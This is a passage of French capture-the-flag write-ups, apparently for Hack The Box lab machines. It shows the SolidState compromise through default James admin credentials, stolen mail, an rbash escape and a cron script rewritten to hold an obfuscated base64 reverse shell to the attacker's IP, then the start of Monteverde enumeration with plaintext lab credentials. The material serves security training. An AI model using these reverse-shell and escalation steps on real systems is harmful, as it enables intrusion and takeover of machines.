l&rsquo;accès à leur boite mail. Ici, on change le mot de passe de l&rsquo;utilisateur <strong>mindy</strong>, password : <strong>mindy</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">telnet 10.10.10.51 <span class="m">4555</span> </span></span><span class="line"><span class="cl">Trying 10.10.10.51... </span></span><span class="line"><span class="cl">Connected to 10.10.10.51. </span></span><span class="line"><span class="cl">Escape character is <span class="s1">&#39;^]&#39;</span>. </span></span><span class="line"><span class="cl">JAMES Remote Administration Tool 2.3.2 </span></span><span class="line"><span class="cl">Please enter your login and password </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Login id: </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">Welcome root. HELP <span class="k">for</span> a list of commands </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">HELP </span></span><span class="line"><span class="cl">Currently implemented commands: </span></span><span class="line"><span class="cl"><span class="nb">help</span> display this <span class="nb">help</span> </span></span><span class="line"><span class="cl">listusers display existing accounts </span></span><span class="line"><span class="cl">countusers display the number of existing accounts </span></span><span class="line"><span class="cl">adduser <span class="o">[</span>username<span class="o">]</span> <span class="o">[</span>password<span class="o">]</span> add a new user </span></span><span class="line"><span class="cl">verify <span class="o">[</span>username<span class="o">]</span> verify <span class="k">if</span> specified user exist </span></span><span class="line"><span class="cl">deluser <span class="o">[</span>username<span class="o">]</span> delete existing user </span></span><span class="line"><span class="cl">setpassword <span class="o">[</span>username<span class="o">]</span> <span class="o">[</span>password<span class="o">]</span> sets a user<span class="s1">&#39;s password </span></span></span><span class="line"><span class="cl"><span class="s1">setalias [user] [alias] locally forwards all email for &#39;</span>user<span class="s1">&#39; to &#39;</span>alias<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">showalias [username] shows a user&#39;</span>s current email <span class="nb">alias</span> </span></span><span class="line"><span class="cl">unsetalias <span class="o">[</span>user<span class="o">]</span> unsets an <span class="nb">alias</span> <span class="k">for</span> <span class="s1">&#39;user&#39;</span> </span></span><span class="line"><span class="cl">setforwarding <span class="o">[</span>username<span class="o">]</span> <span class="o">[</span>emailaddress<span class="o">]</span> forwards a user<span class="s1">&#39;s email to another email address </span></span></span><span class="line"><span class="cl"><span class="s1">showforwarding [username] shows a user&#39;</span>s current email forwarding </span></span><span class="line"><span class="cl">unsetforwarding <span class="o">[</span>username<span class="o">]</span> removes a forward </span></span><span class="line"><span class="cl">user <span class="o">[</span>repositoryname<span class="o">]</span> change to another user repository </span></span><span class="line"><span class="cl">shutdown kills the current JVM <span class="o">(</span>convenient when James is run as a daemon<span class="o">)</span> </span></span><span class="line"><span class="cl">quit close connection </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">listusers </span></span><span class="line"><span class="cl">Existing accounts <span class="m">6</span> </span></span><span class="line"><span class="cl">user: james </span></span><span class="line"><span class="cl">user: ../../../../../../../../etc/bash_completion.d </span></span><span class="line"><span class="cl">user: thomas </span></span><span class="line"><span class="cl">user: john </span></span><span class="line"><span class="cl">user: mindy </span></span><span class="line"><span class="cl">user: mailadmin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">setpassword mindy mindy </span></span><span class="line"><span class="cl">Password <span class="k">for</span> mindy reset </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">quit </span></span><span class="line"><span class="cl">Bye </span></span><span class="line"><span class="cl">Connection closed by foreign host. </span></span></code></pre></td></tr></table> </div> </div><h3 id="pop3--mindy-mails">POP3 : mindy mails </h3><p>En utilisant thunderbird on tente d&rsquo;accéder à ses mails. Une vrai galère&hellip; (pas réussi).</p> <p>Avec <strong>telnet</strong>, on se connecte au port 110 (POP3) avec l&rsquo;utilisateur mindy. On trouve 2 emails, que l&rsquo;on récupère :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">telnet 10.10.10.51 <span class="m">110</span> </span></span><span class="line"><span class="cl">Trying 10.10.10.51... </span></span><span class="line"><span class="cl">Connected to 10.10.10.51. </span></span><span class="line"><span class="cl">Escape character is <span class="s1">&#39;^]&#39;</span>. </span></span><span class="line"><span class="cl">USER mindy </span></span><span class="line"><span class="cl">PASS mindy </span></span><span class="line"><span class="cl">LIST </span></span><span class="line"><span class="cl">+OK solidstate POP3 server <span class="o">(</span>JAMES POP3 Server 2.3.2<span class="o">)</span> ready </span></span><span class="line"><span class="cl">+OK </span></span><span class="line"><span class="cl">+OK Welcome mindy </span></span><span class="line"><span class="cl">+OK <span class="m">2</span> <span class="m">1945</span> </span></span><span class="line"><span class="cl"><span class="m">1</span> <span class="m">1109</span> </span></span><span class="line"><span class="cl"><span class="m">2</span> <span class="m">836</span> </span></span><span class="line"><span class="cl">. </span></span><span class="line"><span class="cl">RETR <span class="m">1</span> </span></span><span class="line"><span class="cl">+OK Message follows </span></span><span class="line"><span class="cl">Return-Path: &lt;mailadmin@localhost&gt; </span></span><span class="line"><span class="cl">Message-ID: &lt;5420213.0.1503422039826.JavaMail.root@solidstate&gt; </span></span><span class="line"><span class="cl">MIME-Version: 1.0 </span></span><span class="line"><span class="cl">Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>us-ascii </span></span><span class="line"><span class="cl">Content-Transfer-Encoding: 7bit </span></span><span class="line"><span class="cl">Delivered-To: mindy@localhost </span></span><span class="line"><span class="cl">Received: from 192.168.11.142 <span class="o">([</span>192.168.11.142<span class="o">])</span> </span></span><span class="line"><span class="cl"> by solidstate <span class="o">(</span>JAMES SMTP Server 2.3.2<span class="o">)</span> with SMTP ID <span class="m">798</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> &lt;mindy@localhost&gt;<span class="p">;</span> </span></span><span class="line"><span class="cl"> Tue, <span class="m">22</span> Aug <span class="m">2017</span> 13:13:42 -0400 <span class="o">(</span>EDT<span class="o">)</span> </span></span><span class="line"><span class="cl">Date: Tue, <span class="m">22</span> Aug <span class="m">2017</span> 13:13:42 -0400 <span class="o">(</span>EDT<span class="o">)</span> </span></span><span class="line"><span class="cl">From: mailadmin@localhost </span></span><span class="line"><span class="cl">Subject: Welcome </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dear Mindy, </span></span><span class="line"><span class="cl">Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will <span class="nb">help</span> you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">We are looking forward to you joining our team and your success at Solid State Security. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Respectfully, </span></span><span class="line"><span class="cl">James </span></span><span class="line"><span class="cl">. </span></span><span class="line"><span class="cl">RETR <span class="m">2</span> </span></span><span class="line"><span class="cl">+OK Message follows </span></span><span class="line"><span class="cl">Return-Path: &lt;mailadmin@localhost&gt; </span></span><span class="line"><span class="cl">Message-ID: &lt;16744123.2.1503422270399.JavaMail.root@solidstate&gt; </span></span><span class="line"><span class="cl">MIME-Version: 1.0 </span></span><span class="line"><span class="cl">Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>us-ascii </span></span><span class="line"><span class="cl">Content-Transfer-Encoding: 7bit </span></span><span class="line"><span class="cl">Delivered-To: mindy@localhost </span></span><span class="line"><span class="cl">Received: from 192.168.11.142 <span class="o">([</span>192.168.11.142<span class="o">])</span> </span></span><span class="line"><span class="cl"> by solidstate <span class="o">(</span>JAMES SMTP Server 2.3.2<span class="o">)</span> with SMTP ID <span class="m">581</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> &lt;mindy@localhost&gt;<span class="p">;</span> </span></span><span class="line"><span class="cl"> Tue, <span class="m">22</span> Aug <span class="m">2017</span> 13:17:28 -0400 <span class="o">(</span>EDT<span class="o">)</span> </span></span><span class="line"><span class="cl">Date: Tue, <span class="m">22</span> Aug <span class="m">2017</span> 13:17:28 -0400 <span class="o">(</span>EDT<span class="o">)</span> </span></span><span class="line"><span class="cl">From: mailadmin@localhost </span></span><span class="line"><span class="cl">Subject: Your Access </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dear Mindy, </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Here are your ssh credentials to access the system. Remember to reset your password after your first login. </span></span><span class="line"><span class="cl">Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">username: mindy </span></span><span class="line"><span class="cl">pass: P@55W0rd1!2@ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Respectfully, </span></span><span class="line"><span class="cl">James </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">. </span></span><span class="line"><span class="cl">EXIT </span></span><span class="line"><span class="cl">-ERR </span></span><span class="line"><span class="cl">QUIT </span></span><span class="line"><span class="cl">+OK Apache James POP3 Server signing off. </span></span><span class="line"><span class="cl">Connection closed by foreign host. </span></span></code></pre></td></tr></table> </div> </div><p>Dans le deuxième email, on trouve des credentials en clair: mindy : <code>P@55W0rd1!2@</code></p> <h3 id="ssh-connection-to-mindy-account--user-flag">SSH Connection to mindy account : user flag </h3><p>On se connecte en ssh à <strong>mindy</strong> et on récupère le flag utilisateur <strong>user.txt</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh mindy@10.10.10.51 </span></span><span class="line"><span class="cl">mindy@10.10.10.51<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Linux solidstate 4.9.0-3-686-pae <span class="c1">#1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The programs included with the Debian GNU/Linux system are free software<span class="p">;</span> </span></span><span class="line"><span class="cl">the exact distribution terms <span class="k">for</span> each program are described in the </span></span><span class="line"><span class="cl">individual files in /usr/share/doc/*/copyright. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent </span></span><span class="line"><span class="cl">permitted by applicable law. </span></span><span class="line"><span class="cl">Last login: Tue Aug <span class="m">22</span> 14:00:02 <span class="m">2017</span> from 192.168.11.142 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mindy@solidstate:~$ cat user.txt </span></span><span class="line"><span class="cl">c00a.....c6b2 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="mindy--restricted-bash">mindy : restricted bash </h3><p>Par défaut, on arrive dans un restricted shell. Presque aucune action n&rsquo;est autorisé&hellip;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mindy@solidstate:~$ ls </span></span><span class="line"><span class="cl">bin user.txt </span></span><span class="line"><span class="cl">mindy@solidstate:~$ <span class="nb">cd</span> .. </span></span><span class="line"><span class="cl">-rbash: cd: restricted </span></span><span class="line"><span class="cl">mindy@solidstate:~$ /bin/ls </span></span><span class="line"><span class="cl">-rbash: /bin/ls: restricted: cannot specify <span class="sb">`</span>/<span class="err">&#39;</span> in <span class="nb">command</span> names </span></span></code></pre></td></tr></table> </div> </div><p>Mais grâce à ssh, on peut préciser une commande à executer au lancement. Par exemple, lui demander de lancer un bash, ce qui permet de bypasser le lancement du restricted bash !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh mindy@10.10.10.51 bash </span></span><span class="line"><span class="cl">mindy@10.10.10.51<span class="s1">&#39;s password: </span></span></span><span class="line"><span class="cl"><span class="s1">ls </span></span></span><span class="line"><span class="cl"><span class="s1">bin </span></span></span><span class="line"><span class="cl"><span class="s1">user.txt </span></span></span><span class="line"><span class="cl"><span class="s1">cd .. </span></span></span><span class="line"><span class="cl"><span class="s1">ls </span></span></span><span class="line"><span class="cl"><span class="s1">james </span></span></span><span class="line"><span class="cl"><span class="s1">mindy </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">---------------------- </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">$ ssh mindy@10.10.10.51 -t &#34;bash --noprofile&#34; </span></span></span><span class="line"><span class="cl"><span class="s1">mindy@10.10.10.51&#39;</span>s password: </span></span><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:~$ ls </span></span><span class="line"><span class="cl">bin user.txt </span></span><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:~$ <span class="nb">cd</span> .. </span></span><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:/home$ ls </span></span><span class="line"><span class="cl">james mindy </span></span><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:/home$ <span class="nb">exit</span> </span></span><span class="line"><span class="cl">Connection to 10.10.10.51 closed. </span></span></code></pre></td></tr></table> </div> </div><h3 id="root-file--opttmppy">root file : /opt/tmp.py </h3><p>A l&rsquo;aide <strong>linpeas</strong> et/ou <strong>linenum</strong>, on découvre un fichier /opt/tmp.py qui semble vider le dossier /tmp en utilisant os.system(). Les droits du fichier sont 777 (rwxrwxrwx). Le fichier appartient à root mais est modifiable par n&rsquo;importe qui, dont <strong>mindy</strong>. J&rsquo;ai donc essayer de mettre une commande pour faire un reverse shell. Au vu de ce que fait ce script, on peut déduire qu&rsquo;il doit etre executé dans une cronjob probablement en tant que root.</p> <p>Après quelques minutes, je reçois bien un shell en tant que root sur la machine, ce qui prouve notre théorie :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:/opt$ cat tmp.py </span></span><span class="line"><span class="cl"><span class="c1">##!/usr/bin/env python</span> </span></span><span class="line"><span class="cl">import os </span></span><span class="line"><span class="cl">import sys </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Reverse shell</span> </span></span><span class="line"><span class="cl">os.system<span class="o">(</span><span class="s1">&#39;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi44LzkwMDEgMD4mMQ== | base64 -d | bash&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Code initial du script</span> </span></span><span class="line"><span class="cl">try: </span></span><span class="line"><span class="cl"> os.system<span class="o">(</span><span class="s1">&#39;rm -r /tmp/* &#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl">except: </span></span><span class="line"><span class="cl"> sys.exit<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9001 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9001 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.51. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.51:58410. </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>31712<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">root@solidstate:~# whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@solidstate:~# cat /root/root.txt </span></span><span class="line"><span class="cl">cat /root/root.txt </span></span><span class="line"><span class="cl">0574.....d2b9 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>TOUJOURS bien regarder en détail l&rsquo;execution de linpeas ou de linenum. Parfois, on peut rater des fichiers/binaires, qui ne sont pas habituels. Par exemple ici, on avait /opt/tmp.py qui aurait du me sauter aux yeux. Ces fichiers ne sont pas forcément surlignés en rouge&hellip;</li> </ul>https://leopoldabgn.github.io/writeups/p/monteverde-htb/Sun, 20 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/monteverde-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Monteverde cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Monteverde</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.172</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SABatchJobs:SABatchJobs </span></span><span class="line"><span class="cl">mhope:4n0therD4y@n0th3r$ </span></span><span class="line"><span class="cl">administrator:d0m@in4dminyeah! </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.172 </span></span><span class="line"><span class="cl">Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-07-17 23:38 CEST </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-07-17 21:39:43Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49673/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49674/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49676/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49696/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49750/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">Warning: OSScan results may be unreliable because we could not find at least <span class="m">1</span> open and <span class="m">1</span> closed port </span></span><span class="line"><span class="cl">OS fingerprint not ideal because: Missing a closed TCP port so results incomplete </span></span><span class="line"><span class="cl">No OS matches <span class="k">for</span> host </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="getting-users-using-nxc">Getting users using nxc </h3><p>Avec <code>nxc smb</code> et l&rsquo;utilisateur anonyme on récupère une liste d&rsquo;utilisateurs.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.10.172 -u <span class="s1">&#39;&#39;</span> -p <span class="s1">&#39;&#39;</span> --users <span class="p">|</span> tr -s <span class="s1">&#39; &#39;</span> <span class="p">|</span> cut -d <span class="s1">&#39; &#39;</span> -f <span class="m">5</span> <span class="p">|</span> head -n13 <span class="p">|</span> tail -n <span class="m">10</span> <span class="p">|</span> tee users.txt </span></span><span 